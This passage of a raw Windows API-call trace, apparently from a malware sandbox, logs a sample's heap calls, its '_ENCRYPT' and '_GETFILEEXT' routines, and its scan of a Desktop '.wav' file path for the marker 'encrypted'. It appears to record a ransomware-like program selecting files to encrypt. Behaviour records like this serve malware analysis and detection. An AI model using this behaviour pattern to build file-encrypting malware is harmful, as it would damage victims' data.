HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0031.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0031.552] CloseHandle (hObject=0x140) returned 1 [0031.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0031.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0031.553] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0031.553] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0031.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0031.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0031.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0031.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0031.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0031.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0031.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0031.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.553] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.553] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0031.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0031.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.553] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0031.553] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0031.553] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.554] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0031.554] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0031.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="av", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wav", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".wav", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.554] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.554] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.554] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.554] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47f380b0, ftCreationTime.dwHighDateTime=0x1d5c461, ftLastAccessTime.dwLowDateTime=0xdd7f2430, ftLastAccessTime.dwHighDateTime=0x1d5c14c, ftLastWriteTime.dwLowDateTime=0xdd7f2430, ftLastWriteTime.dwHighDateTime=0x1d5c14c, nFileSizeHigh=0x0, nFileSizeLow=0xb402, dwReserved0=0x0, dwReserved1=0x777648, cFileName="uzxBvZA9ThehQNQn.wav", cAlternateFileName="UZXBVZ~1.WAV")) returned 0x7c20c0 [0031.554] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.554] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.554] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47f380b0, ftCreationTime.dwHighDateTime=0x1d5c461, ftLastAccessTime.dwLowDateTime=0xdd7f2430, ftLastAccessTime.dwHighDateTime=0x1d5c14c, ftLastWriteTime.dwLowDateTime=0xdd7f2430, ftLastWriteTime.dwHighDateTime=0x1d5c14c, nFileSizeHigh=0x0, nFileSizeLow=0xb402, dwReserved0=0x0, dwReserved1=0x777648, cFileName="uzxBvZA9ThehQNQn.wav", cAlternateFileName="UZXBVZ~1.WAV")) returned 0x7c20c0 [0031.554] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0031.554] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.554] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.555] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="33uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.556] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.556] CompareStringW (Locale=0x400, 